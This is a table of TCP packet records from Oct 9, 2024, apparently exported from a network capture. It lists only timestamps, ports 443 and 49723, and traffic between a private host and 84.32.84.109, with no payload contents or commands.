Oct 9, 2024 16:16:05.463825941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.463867903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.463869095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.463880062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.463912964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.465344906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465429068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465447903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.465456009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465473890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465473890 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.465506077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465517044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.465523005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465538979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.465635061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465665102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465676069 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.465682030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465694904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.465868950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465919018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465940952 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.465946913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465958118 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.465970039 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.466001034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.466010094 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.466017008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.466039896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.466047049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.466070890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.466093063 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.466099024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.466125965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.487700939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.487756968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.487778902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.487788916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.487802029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.487848043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.487868071 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.487874985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.487905025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.511394024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.511454105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.511465073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.511475086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.511493921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.511501074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.511522055 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.511548996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.511554956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.511611938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.545806885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.545866013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.545886993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.545902967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.545918941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.545919895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.545968056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.545986891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.545993090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.546015978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.546716928 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.546752930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.546771049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.546777964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.546789885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.550837040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.550928116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.550951958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.550959110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.550976038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.551301003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.551352024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.551376104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.551382065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.551402092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.551490068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.551549911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.551583052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.551589012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.551611900 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.553102016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553153038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.553158045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553169966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553205967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553230047 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.553411007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553432941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.553440094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553456068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.553495884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553530931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553538084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.553544044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553630114 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553651094 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.553853035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553875923 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.553883076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553896904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553900003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.553942919 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553944111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.553952932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.553988934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.554008961 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.554024935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.554049969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.554055929 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.554075003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.575726032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.575781107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.575822115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.575845957 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.575856924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.575874090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.576013088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.576013088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.576013088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.576023102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.599203110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.599262953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.599282026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.599299908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.599315882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.599317074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.599370956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.599381924 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.599400997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.599427938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.633522034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.633584023 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.633627892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.633642912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.633658886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.633678913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.633688927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.633723974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.633732080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.634557009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.634609938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.634618044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.634625912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.634692907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.638689041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.638739109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.638757944 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.638767958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.638786077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.639004946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.639055967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.639065027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.639102936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.639133930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.639173031 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.639218092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.639265060 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.639290094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.639327049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.641030073 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641202927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.641290903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641350985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.641354084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641367912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641411066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641416073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.641416073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.641427040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641443014 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.641510010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641568899 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.641576052 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641623974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.641633034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641691923 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.641742945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641834021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641844034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.641849995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641928911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641938925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.641979933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.641994953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.642003059 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.642059088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.642174959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.642222881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.642227888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.642246008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.642281055 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.642288923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.642301083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.663315058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.663376093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.663419008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.663424015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.663446903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.663448095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.663492918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.663518906 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.663535118 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.663553953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.687653065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.687709093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.687782049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.687802076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.687802076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.687824965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.687843084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.687865019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.687902927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.687947989 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.721138000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.721215963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.721231937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.721240044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.721330881 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.721333981 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.721347094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.721370935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.721401930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.721421957 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.721429110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.721448898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.722301960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.722349882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.722357035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.722367048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.722403049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.726393938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.726444960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.726531029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.726531029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.726552010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.726993084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.727133989 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.727139950 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.727152109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.727180958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.727204084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.727236986 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.727245092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.727281094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.727303982 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.727312088 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.727329969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.730246067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730345964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730365038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.730380058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730393887 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.730439901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730493069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730514050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.730520964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730545044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.730588913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730635881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.730643988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730658054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730709076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.730709076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.730717897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730768919 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730856895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730869055 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.730875015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.730902910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.730986118 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.731040955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.731048107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.731069088 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.731095076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.731102943 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.731123924 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.731142998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.731178999 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.731185913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.731342077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.751588106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.751678944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.751694918 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.751718044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.751737118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.751799107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.751816988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.751825094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.751843929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.751868010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.751909971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.751918077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.751957893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.775245905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.775326967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.775347948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.775369883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.775393963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.775412083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.775418997 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.775425911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.775458097 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.775551081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.775587082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.775594950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.775629044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.808934927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.809010029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.809026003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.809061050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.809083939 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.809092999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.809118986 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.809139013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.809139013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.809889078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.810020924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.810044050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.810050011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.810069084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.810641050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.813951015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.814002037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.814188004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.814347029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.814629078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.814682961 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.814733028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.814785004 CEST	49723	443	192.168.2.10	84.32.84.109
